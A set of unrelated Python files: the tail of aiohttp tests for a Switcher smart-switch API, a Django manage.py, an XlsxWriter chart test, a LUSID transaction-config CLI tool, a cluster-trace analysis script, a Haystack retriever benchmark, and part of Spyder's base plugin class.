bs4scrap.text
== "Error: Argument schedule_data is missing."
)
disable_enable_schedule_response.msg_type = (
ResponseMessageType.STATE
)
async with session.patch(
URL_ENABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_get_schedules_request(
get_schedules_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/get_schedules request.
Args:
get_schedules_response: fixture of mocked
``SwitcherV2GetScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.get_schedules",
return_value=get_schedules_response,
):
async with ClientSession() as session:
async with session.get(URL_GET_SCHEDULES) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
assert body[consts.KEY_FOUND_SCHEDULES]
assert len(body[consts.KEY_SCHEDULES]) == 1
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_SCHEDULE_ID]
== consts.DUMMY_SCHEDULE_ID
)
assert body[consts.KEY_SCHEDULES][0][consts.KEY_ENABLED]
assert body[consts.KEY_SCHEDULES][0][consts.KEY_RECURRING]
assert len(body[consts.KEY_SCHEDULES][0][consts.KEY_DAYS]) == 1
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_DAYS][0]
== WEEKDAY_TUP[get_next_weekday()]
)
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_START_TIME]
== consts.DUMMY_START_TIME
)
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_END_TIME]
== consts.DUMMY_END_TIME
)
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_DURATION]
== consts.DUMMY_DURATION
)
get_schedules_response.successful = False
async with session.get(URL_GET_SCHEDULES) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
async def test_get_state_request(get_state_response: MagicMock) -> None:
"""Unit test-cases for /switcher/get_state request.
Args:
get_state_response: fixture of mocked
``SwitcherV2StateResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.get_state",
return_value=get_state_response,
) as patcher:
async with ClientSession() as session:
async with session.get(URL_GET_STATE) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
assert body[consts.KEY_STATE] == STATE_ON
assert body[consts.KEY_TIME_LEFT] == consts.DUMMY_TIME_LEFT
assert body[consts.KEY_TIME_ON] == consts.DUMMY_TIME_ON
assert body[consts.KEY_AUTO_OFF] == consts.DUMMY_AUTO_OFF
assert body[consts.KEY_POWER_CONSUMPTION] == (
consts.DUMMY_POWER_CONSUMPTION
)
assert body[consts.KEY_ELECTRIC_CURRENT] == (
consts.DUMMY_ELECTRIC_CURRENT
)
get_state_response.init_future.result().successful = False
async with ClientSession() as session:
async with session.get(URL_GET_STATE) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
patcher.return_value = None
async with session.get(URL_GET_STATE) as response:
assert response.status == 503
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Failed to get response from api."
)
async def test_set_auto_shutdown_request(
set_auto_shutdown_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/set_auto_shutdown request.
Args:
set_auto_shutdown_response: fixture of mocked
``SwitcherV2SetAutoOffResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.set_auto_shutdown",
return_value=set_auto_shutdown_response,
):
async with ClientSession() as session:
async with session.post(
URL_SET_AUTO_SHUTDOWN,
params={consts.PARAM_HOURS: "1", consts.PARAM_MINUTES: "30"},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_AUTO_SHUTDOWN,
**{
"json": {
consts.PARAM_HOURS: "1",
consts.PARAM_MINUTES: "30",
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_AUTO_SHUTDOWN,
params={consts.PARAM_HOURS: "3", consts.PARAM_MINUTES: "1"},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Auto shutdown can be set between 1 and 3 hours."
)
async with session.post(URL_SET_AUTO_SHUTDOWN) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: One of the arguments hours or minutes is missing." # noqa: E501
)
set_auto_shutdown_response.msg_type = ResponseMessageType.STATE
async with session.post(
URL_SET_AUTO_SHUTDOWN,
params={consts.PARAM_HOURS: "1", consts.PARAM_MINUTES: "30"},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_set_device_name_request(
set_device_name_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/set_device_name request.
Args:
set_device_name_response: fixture of mocked
``SwitcherV2UpdateNameResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.set_device_name",
return_value=set_device_name_response,
):
async with ClientSession() as session:
async with session.post(
URL_SET_DEVICE_NAME,
params={consts.PARAM_NAME: "new device name"},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_DEVICE_NAME,
**{"json": {consts.PARAM_NAME: "new device name"}},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_SET_DEVICE_NAME, params={consts.PARAM_NAME: "x"}
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Only accepts name with length between 2 and 32."
)
async with session.post(URL_SET_DEVICE_NAME) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.text == "Error: Argument name is missing."
set_device_name_response.msg_type = ResponseMessageType.STATE
async with session.post(
URL_SET_DEVICE_NAME,
params={consts.PARAM_NAME: "new device name"},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_turn_off_request(control_response: MagicMock) -> None:
"""Unit test-cases for /switcher/turn_off request.
Args:
control_response: fixture of mocked
``SwitcherV2ControlResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.control_device",
return_value=control_response,
):
async with ClientSession() as session:
async with session.post(URL_TURN_OFF) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
control_response.successful = False
async with session.post(URL_TURN_OFF) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE not in body
control_response.msg_type = ResponseMessageType.STATE
async with session.post(URL_TURN_OFF) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_turn_on_request(control_response: MagicMock) -> None:
"""Unit test-cases for /switcher/turn_on request.
Args:
control_response: fixture of mocked
``SwitcherV2ControlResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.control_device",
return_value=control_response,
):
async with ClientSession() as session:
async with session.post(URL_TURN_ON) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, params={consts.PARAM_MINUTES: 30}
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, **{"json": {consts.PARAM_MINUTES: 30}}
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, params={consts.PARAM_MINUTES: 181}
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Can only accept timer for 1 to 180 minutes."
)
control_response.msg_type = ResponseMessageType.STATE
async with session.post(URL_TURN_ON) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
control_response.successful = False
control_response.msg_type = ResponseMessageType.CONTROL
async with session.post(URL_TURN_ON) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
async with session.post(
URL_TURN_ON, params={consts.PARAM_MINUTES: "noint"}
) as response:
assert response.status == 500
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.h1.text == "Internal Server Error"
async with session.post(
URL_TURN_ON, **{"json": {consts.PARAM_MINUTES: "noint"}}
) as response:
assert response.status == 500
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.h1.text == "Internal Server Error"
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core_app.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_data_labels19.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'column'})
chart.axis_ids = [45740416, 45747584]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({
'values': '=Sheet1!$A$1:$A$5',
'data_labels': {'value': 1, 'category': 1},
})
chart.add_series({
'values': '=Sheet1!$B$1:$B$5',
'data_labels': {'value': 1, 'category': 1, 'separator': "\n"},
})
chart.add_series({
'values': '=Sheet1!$C$1:$C$5',
'data_labels': {'value': 1, 'category': 1, 'separator': ' '},
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
|
from lusidtools.lpt import lpt
from lusidtools.lpt import lse
from lusidtools.lpt import stdargs
from lusidtools.lpt import txn_config_yaml as tcy
TOOLNAME = "txn_cfg"
TOOLTIP = "Get/Set the transaction configuration"
def parse(extend=None, args=None):
return (
stdargs.Parser(
"Get/Set transaction configuration", ["filename", "limit", "NODFQ"]
)
.add(
"action",
choices=("get", "set", "try"),
help="get or set the config. 'Try' can be used to validate a custom encoding",
)
.add("--raw", action="store_true", help="use raw (non custom) encoding")
.add("--json", action="store_true", help="display the json to be sent")
.add("--group", action="store_true", help="set a single group")
.add(
"--force",
action="store_true",
help="set a single group, remove existing aliases for the group",
)
.extend(extend)
.parse(args)
)
def validate_group(txn_types, group):
for txn in txn_types:
for alias in txn.aliases:
assert alias.transaction_group == group, "More than one group in the list"
def rem_groups(txn_types_old, group, arg):
def still_valid(tt):
for cand in tt.aliases:
if cand.transaction_group != group:
return True
if arg is not True:
raise AssertionError(
"Existing group detected, use '--force' to remove them"
)
return False
def clear_out_group(tt):
check = len(tt.aliases)
tt.aliases = [cand for cand in tt.aliases if cand.transaction_group != group]
        if len(tt.aliases) != check and arg is not True:
raise AssertionError(
"Existing group detected, use '--force' to remove them"
)
return tt
return [clear_out_group(t) for t in txn_types_old if still_valid(t)]
def merge_sets(txn_types_old, txn_types, arg):
group = txn_types[0].aliases[0].transaction_group
validate_group(txn_types, group)
txn_types_clean = rem_groups(txn_types_old, group, arg)
txn_types += txn_types_clean
return txn_types
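# Illustrative example (hypothetical data): if the existing configuration holds
# aliases for groups "default" and "custom" and the uploaded file defines only
# group "custom", merge_sets() checks that the upload contains a single group,
# drops the old "custom" aliases from the existing types (raising unless
# '--force' was passed) and appends the surviving existing types to the newly
# uploaded "custom" definitions.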
def process_args(api, args):
y = tcy.TxnConfigYaml(api.models)
if args.action == "get":
def get_success(result):
y.dump(
y.TransactionSetConfigurationDataNoLinks(
result.content.transaction_configs, result.content.side_definitions
),
args.filename,
args.raw,
)
return None
return api.call.list_configuration_transaction_types().bind(get_success)
if args.action == "try":
ffs = y.load(args.filename)
y.dump(ffs, "{}-try".format(args.filename))
if args.action == "set":
def set_success(result):
print(y.get_yaml(result.content))
return None
if args.group:
txn_types = y.load(args.filename)
result = api.call.list_configuration_transaction_types()
if result.right is not None:
txn_types_old = result.right.content
else:
raise ValueError("Api call did not return correct result")
txn_types = y.load_update_str(
y.get_yaml(merge_sets(txn_types_old, txn_types, args.force))
)
else:
txn_types = y.load_update(args.filename)
# y.dump(ffs,"{}-set".format(args.filename),True)
if args.json:
print(txn_types)
return None
else:
return api.call.set_configuration_transaction_types(types=txn_types).bind(
set_success
)
# Standalone tool
def main(parse=parse):
lpt.standard_flow(parse, lse.connect, process_args)
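# --- Hypothetical usage sketch (the exact argument syntax comes from stdargs
# and is an assumption here):
#   get -> download the live configuration and dump it to the given file
#   try -> load a local file and re-dump it to "<filename>-try" to validate
#          the custom YAML encoding
#   set -> upload a configuration; with '--group' (plus '--force' to replace
#          existing aliases) only a single transaction group is merged in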
|
# -*- coding: utf-8 -*-
# In this script we reconstruct the full history of every evicted task that was
# never finished/killed/failed/lost: how many times it was submitted and which
# events relate to it.
# The violatedtasks dictionary is the result we are after. It holds one entry
# per (job_id, task_index) key, with the remaining fields stored in a
# multidimensional list.
# This database is only a test, since it uses just 1/500 of the task_events
# table; likewise, not_finished_evictedtasks covers only the first 1/500 part
# of the task_events table.
# Because the script assumes the machine table changes state whenever a task is
# added, it does not produce correct results: the machines table is only
# updated when a machine itself changes, so it records machine events only. To
# find the available cpu, memory and disk of a machine at the moment a task is
# assigned to it, more involved calculations are needed (refer to createDB3).
# @author: reyhane_askari
# Universite de Montreal, Dec 2015
from os import chdir, listdir
from pandas import read_csv
from os import path
from random import randint, sample, seed
from collections import OrderedDict
from pandas import DataFrame
import numpy as np
import matplotlib.pyplot as plt
import csv
import codecs
chdir('/home/askrey/Dropbox/Project_step_by_step/2_find_violations/csvs')
task_events_csv_colnames = ['time', 'missing', 'job_id', 'task_idx', 'machine_id', 'event_type', 'user', 'sched_cls',
'priority', 'cpu_requested', 'mem_requested', 'disk', 'restriction']
evictedtasks = OrderedDict([])
violatedtasks = OrderedDict([])
for key, val in csv.reader(open("not_finished_evictedtasks.csv")):
evictedtasks[key] = val
machines_dictionary = OrderedDict([])
#load machine events table:
chdir('/home/askrey/Final_project')
reader = csv.reader(codecs.open('part-00000-of-00001.csv','rU','utf-8'))
# key of machines_dictionary is the primary fields of the machine events table (time, machine id)
# other fields: event type, platform id, CUPs, memory
for row in reader:
machines_dictionary[(row[0],row[1])] = row[2:]
#for fn in sorted(listdir('task_events')):
fp = path.join('task_events',sorted(listdir('task_events'))[0])
task_events_df = read_csv(fp, header = None, index_col = False, names = task_events_csv_colnames, compression = 'gzip')
for index, event in task_events_df.iterrows():
if (event['job_id'], event['task_idx']) in violatedtasks:
violatedtasks[event['job_id'],event['task_idx']][0].append(event['time'])
violatedtasks[event['job_id'],event['task_idx']][2].append(event['machine_id'])
violatedtasks[event['job_id'],event['task_idx']][3].append(event['event_type'])
violatedtasks[event['job_id'],event['task_idx']][11].append((machines_dictionary[(str(event['time']),str(event['machine_id']))] if (str(event['time']), str(event['machine_id'])) in machines_dictionary else 0))
elif ("("+str(event['job_id'])+ ", "+ str(event['task_idx'])+")") in evictedtasks:
violatedtasks[event['job_id'],event['task_idx']] = [[event['time']],event['missing'],[event['machine_id']],
[event['event_type']], event['user'], event['sched_cls'], event['priority'], event['cpu_requested'],
event['mem_requested'], event['disk'], event['restriction'],
[(machines_dictionary[(str(event['time']),str(event['machine_id']))] if (str(event['time']), str(event['machine_id'])) in machines_dictionary else 0 )]]
# The remaining problem is that some events have not yet had a machine assigned
# to them, which is why their machine_id is NaN.
writer = csv.writer(open('/home/askrey/Dropbox/Databases/testDB5.csv', 'wb'))
for key, value in violatedtasks.items():
writer.writerow([key, value])
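# --- Sketch of the "more complicated calculation" referred to in the header
# (an assumption; see createDB3 for the real implementation): replay machine
# and task events in time order, keep each machine's capacity from the machine
# table together with a running sum of the cpu/memory/disk requested by the
# tasks currently placed on it, and report capacity minus that running sum as
# the resources available at the moment a task is assigned.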
|
import pandas as pd
from pathlib import Path
from time import perf_counter
from utils import get_document_store, get_retriever, index_to_doc_store, load_config
from haystack.preprocessor.utils import eval_data_from_json
from haystack.document_store.faiss import FAISSDocumentStore
from haystack import Document
import pickle
import time
from tqdm import tqdm
import logging
import datetime
import random
import traceback
import os
import requests
from farm.file_utils import download_from_s3
import json
from results_to_json import retriever as retriever_json
from templates import RETRIEVER_TEMPLATE, RETRIEVER_MAP_TEMPLATE, RETRIEVER_SPEED_TEMPLATE
logger = logging.getLogger(__name__)
logging.getLogger("haystack.retriever.base").setLevel(logging.WARN)
logging.getLogger("elasticsearch").setLevel(logging.WARN)
doc_index = "eval_document"
label_index = "label"
index_results_file = "retriever_index_results.csv"
query_results_file = "retriever_query_results.csv"
overview_json = "../../docs/_src/benchmarks/retriever_performance.json"
map_json = "../../docs/_src/benchmarks/retriever_map.json"
speed_json = "../../docs/_src/benchmarks/retriever_speed.json"
seed = 42
random.seed(42)
def benchmark_indexing(n_docs_options, retriever_doc_stores, data_dir, filename_gold, filename_negative, data_s3_url, embeddings_filenames, embeddings_dir, update_json, save_markdown, **kwargs):
retriever_results = []
for n_docs in n_docs_options:
for retriever_name, doc_store_name in retriever_doc_stores:
logger.info(f"##### Start indexing run: {retriever_name}, {doc_store_name}, {n_docs} docs ##### ")
try:
doc_store = get_document_store(doc_store_name)
retriever = get_retriever(retriever_name, doc_store)
docs, _ = prepare_data(data_dir=data_dir,
filename_gold=filename_gold,
filename_negative=filename_negative,
data_s3_url=data_s3_url,
embeddings_filenames=embeddings_filenames,
embeddings_dir=embeddings_dir,
n_docs=n_docs)
tic = perf_counter()
index_to_doc_store(doc_store, docs, retriever)
toc = perf_counter()
indexing_time = toc - tic
print(indexing_time)
retriever_results.append({
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"indexing_time": indexing_time,
"docs_per_second": n_docs / indexing_time,
"date_time": datetime.datetime.now(),
"error": None})
retriever_df = pd.DataFrame.from_records(retriever_results)
retriever_df = retriever_df.sort_values(by="retriever").sort_values(by="doc_store")
retriever_df.to_csv(index_results_file)
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
if save_markdown:
md_file = index_results_file.replace(".csv", ".md")
with open(md_file, "w") as f:
f.write(str(retriever_df.to_markdown()))
time.sleep(10)
del doc_store
del retriever
except Exception:
tb = traceback.format_exc()
logging.error(f"##### The following Error was raised while running indexing run: {retriever_name}, {doc_store_name}, {n_docs} docs #####")
logging.error(tb)
retriever_results.append({
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"indexing_time": 0,
"docs_per_second": 0,
"date_time": datetime.datetime.now(),
"error": str(tb)})
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
time.sleep(10)
del doc_store
del retriever
if update_json:
populate_retriever_json()
def benchmark_querying(n_docs_options,
retriever_doc_stores,
data_dir,
data_s3_url,
filename_gold,
filename_negative,
n_queries,
embeddings_filenames,
embeddings_dir,
update_json,
save_markdown,
**kwargs):
""" Benchmark the time it takes to perform querying. Doc embeddings are loaded from file."""
retriever_results = []
for n_docs in n_docs_options:
for retriever_name, doc_store_name in retriever_doc_stores:
try:
logger.info(f"##### Start querying run: {retriever_name}, {doc_store_name}, {n_docs} docs ##### ")
if retriever_name == "elastic":
similarity = "cosine"
else:
similarity = "dot_product"
doc_store = get_document_store(doc_store_name, similarity=similarity)
retriever = get_retriever(retriever_name, doc_store)
add_precomputed = retriever_name in ["dpr"]
# For DPR, precomputed embeddings are loaded from file
docs, labels = prepare_data(data_dir=data_dir,
filename_gold=filename_gold,
filename_negative=filename_negative,
data_s3_url=data_s3_url,
embeddings_filenames=embeddings_filenames,
embeddings_dir=embeddings_dir,
n_docs=n_docs,
n_queries=n_queries,
add_precomputed=add_precomputed)
logger.info("Start indexing...")
index_to_doc_store(doc_store, docs, retriever, labels)
logger.info("Start queries...")
raw_results = retriever.eval()
results = {
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"n_queries": raw_results["n_questions"],
"retrieve_time": raw_results["retrieve_time"],
"queries_per_second": raw_results["n_questions"] / raw_results["retrieve_time"],
"seconds_per_query": raw_results["retrieve_time"]/ raw_results["n_questions"],
"recall": raw_results["recall"] * 100,
"map": raw_results["map"] * 100,
"top_k": raw_results["top_k"],
"date_time": datetime.datetime.now(),
"error": None
}
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
time.sleep(5)
del doc_store
del retriever
except Exception:
tb = traceback.format_exc()
logging.error(f"##### The following Error was raised while running querying run: {retriever_name}, {doc_store_name}, {n_docs} docs #####")
logging.error(tb)
results = {
"retriever": retriever_name,
"doc_store": doc_store_name,
"n_docs": n_docs,
"n_queries": 0,
"retrieve_time": 0.,
"queries_per_second": 0.,
"seconds_per_query": 0.,
"recall": 0.,
"map": 0.,
"top_k": 0,
"date_time": datetime.datetime.now(),
"error": str(tb)
}
logger.info("Deleting all docs from this run ...")
if isinstance(doc_store, FAISSDocumentStore):
doc_store.session.close()
else:
doc_store.delete_all_documents(index=doc_index)
doc_store.delete_all_documents(index=label_index)
time.sleep(5)
del doc_store
del retriever
logger.info(results)
retriever_results.append(results)
retriever_df = pd.DataFrame.from_records(retriever_results)
retriever_df = retriever_df.sort_values(by="retriever").sort_values(by="doc_store")
retriever_df.to_csv(query_results_file)
if save_markdown:
md_file = query_results_file.replace(".csv", ".md")
with open(md_file, "w") as f:
f.write(str(retriever_df.to_markdown()))
if update_json:
populate_retriever_json()
def populate_retriever_json():
retriever_overview_data, retriever_map_data, retriever_speed_data = retriever_json(index_csv=index_results_file,
query_csv=query_results_file)
overview = RETRIEVER_TEMPLATE
overview["data"] = retriever_overview_data
map = RETRIEVER_MAP_TEMPLATE
map["data"] = retriever_map_data
speed = RETRIEVER_SPEED_TEMPLATE
speed["data"] = retriever_speed_data
json.dump(overview, open(overview_json, "w"), indent=4)
json.dump(speed, open(speed_json, "w"), indent=4)
json.dump(map, open(map_json, "w"), indent=4)
def add_precomputed_embeddings(embeddings_dir, embeddings_filenames, docs):
ret = []
id_to_doc = {x.meta["passage_id"]: x for x in docs}
for ef in embeddings_filenames:
logger.info(f"Adding precomputed embeddings from {embeddings_dir + ef}")
filename = embeddings_dir + ef
embeds = pickle.load(open(filename, "rb"))
for i, vec in embeds:
if int(i) in id_to_doc:
curr = id_to_doc[int(i)]
curr.embedding = vec
ret.append(curr)
# In the official DPR repo, there are only 20594995 precomputed embeddings for 21015324 wikipedia passages
# If there isn't an embedding for a given doc, we remove it here
ret = [x for x in ret if x.embedding is not None]
logger.info(f"Embeddings loaded for {len(ret)}/{len(docs)} docs")
return ret
def prepare_data(data_dir, filename_gold, filename_negative, data_s3_url, embeddings_filenames, embeddings_dir, n_docs=None, n_queries=None, add_precomputed=False):
"""
filename_gold points to a squad format file.
    filename_negative points to a tab-separated file whose columns are doc_id, document text and title.
If add_precomputed is True, this fn will look in the embeddings files for precomputed embeddings to add to each Document
"""
logging.getLogger("farm").setLevel(logging.INFO)
download_from_s3(data_s3_url + filename_gold, cache_dir=data_dir)
download_from_s3(data_s3_url + filename_negative, cache_dir=data_dir)
if add_precomputed:
for embedding_filename in embeddings_filenames:
download_from_s3(data_s3_url + str(embeddings_dir) + embedding_filename, cache_dir=data_dir)
logging.getLogger("farm").setLevel(logging.WARN)
gold_docs, labels = eval_data_from_json(data_dir + filename_gold)
# Reduce number of docs
gold_docs = gold_docs[:n_docs]
# Remove labels whose gold docs have been removed
doc_ids = [x.id for x in gold_docs]
labels = [x for x in labels if x.document_id in doc_ids]
# Filter labels down to n_queries
selected_queries = list(set(f"{x.document_id} | {x.question}" for x in labels))
selected_queries = selected_queries[:n_queries]
labels = [x for x in labels if f"{x.document_id} | {x.question}" in selected_queries]
n_neg_docs = max(0, n_docs - len(gold_docs))
neg_docs = prepare_negative_passages(data_dir, filename_negative, n_neg_docs)
docs = gold_docs + neg_docs
if add_precomputed:
docs = add_precomputed_embeddings(data_dir + embeddings_dir, embeddings_filenames, docs)
return docs, labels
def prepare_negative_passages(data_dir, filename_negative, n_docs):
if n_docs == 0:
return []
with open(data_dir + filename_negative) as f:
lines = []
_ = f.readline() # Skip column titles line
for _ in range(n_docs):
lines.append(f.readline()[:-1])
docs = []
for l in lines[:n_docs]:
id, text, title = l.split("\t")
d = {"text": text,
"meta": {"passage_id": int(id),
"title": title}}
d = Document(**d)
docs.append(d)
return docs
if __name__ == "__main__":
params, filenames = load_config(config_filename="config.json", ci=True)
benchmark_indexing(**params, **filenames, update_json=True, save_markdown=False)
benchmark_querying(**params, **filenames, update_json=True, save_markdown=False)
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Base plugin class
"""
# Standard library imports
import inspect
import os
import sys
# Third party imports
import qdarkstyle
from qtpy.QtCore import Qt, Slot
from qtpy.QtGui import QCursor, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QToolButton)
# Local imports
from spyder.config.base import _
from spyder.config.gui import get_color_scheme, get_font, is_dark_interface
from spyder.config.manager import CONF
from spyder.config.user import NoDefault
from spyder.py3compat import configparser, is_text_string
from spyder.utils.icon_manager import ima
from spyder.utils.qthelpers import (
add_actions, create_action, create_toolbutton, MENU_SEPARATOR,
toggle_actions, set_menu_icons)
from spyder.widgets.dock import SpyderDockWidget
class BasePluginMixin(object):
"""Implementation of the basic functionality for Spyder plugins."""
# Define configuration name map for plugin to split configuration
# among several files. See spyder/config/main.py
# Status: Hidden
_CONF_NAME_MAP = None
def __init__(self, parent=None):
super(BasePluginMixin, self).__init__()
# Check compatibility
check_compatibility, message = self.check_compatibility()
self._register_plugin()
self._is_compatible = True
if not check_compatibility:
self._is_compatible = False
self._show_compatibility_message(message)
def _register_plugin(self):
"""Register plugin configuration."""
CONF.register_plugin(self)
def _set_option(self, option, value, section=None,
recursive_notification=True):
"""Set option in spyder.ini"""
section = self.CONF_SECTION if section is None else section
CONF.set(section, str(option), value,
recursive_notification=recursive_notification)
def _get_option(self, option, default=NoDefault, section=None):
"""Get option from spyder.ini."""
section = self.CONF_SECTION if section is None else section
return CONF.get(section, option, default)
def _remove_option(self, option, section=None):
"""Remove option from spyder.ini."""
section = self.CONF_SECTION if section is None else section
CONF.remove_option(section, option)
def _show_status_message(self, message, timeout=0):
"""Show message in main window's status bar."""
self.main.statusBar().showMessage(message, timeout)
def _show_compatibility_message(self, message):
"""Show a compatibility message."""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle('Compatibility Check')
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def _starting_long_process(self, message):
"""
Show message in main window's status bar and change cursor to
Qt.WaitCursor
"""
self._show_status_message(message)
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
QApplication.processEvents()
def _ending_long_process(self, message=""):
"""
Clear main window's status bar and restore mouse cursor.
"""
QApplication.restoreOverrideCursor()
self._show_status_message(message, timeout=2000)
QApplication.processEvents()
def _get_plugin_path(self):
"""Return filesystem path to the root directory of the plugin."""
return os.path.dirname(inspect.getfile(self.__class__))
def _create_configwidget(self, dlg, main_window):
"""Create configuration dialog box page widget"""
if self.CONFIGWIDGET_CLASS is not None:
parent = self
main = dlg
if not hasattr(self, 'dockwidget'):
# Prevent QWidget assignment to a plugin that does not have
# a graphical widget.
parent = dlg
main = main_window
configwidget = self.CONFIGWIDGET_CLASS(parent, main)
configwidget.initialize()
return configwidget
class PluginWindow(QMainWindow):
"""MainWindow subclass that contains a Spyder Plugin."""
def __init__(self, plugin):
QMainWindow.__init__(self)
self.plugin = plugin
# Setting interface theme
if is_dark_interface():
self.setStyleSheet(qdarkstyle.load_stylesheet_from_environment())
def closeEvent(self, event):
"""Reimplement Qt method."""
self.plugin.set_ancestor(self.plugin.main)
self.plugin.dockwidget.setWidget(self.plugin)
self.plugin.dockwidget.setVisible(True)
self.plugin.switch_to_plugin()
QMainWindow.closeEvent(self, event)
# Qt might want to do something with this soon,
# So it should not be deleted by python yet.
# Fixes spyder-ide/spyder#10704
self.plugin.__unsafe__window = self
self.plugin._undocked_window = None
class BasePluginWidgetMixin(object):
"""
Implementation of the basic functionality for Spyder plugin widgets.
"""
def __init__(self, parent=None):
super(BasePluginWidgetMixin, self).__init__()
# Actions to add to the Options menu
self._plugin_actions = None
# Attribute to keep track if the plugin is undocked in a
# separate window
self._undocked_window = None
self._ismaximized = False
self._default_margins = None
self._isvisible = False
self.shortcut = None
# Options buttons
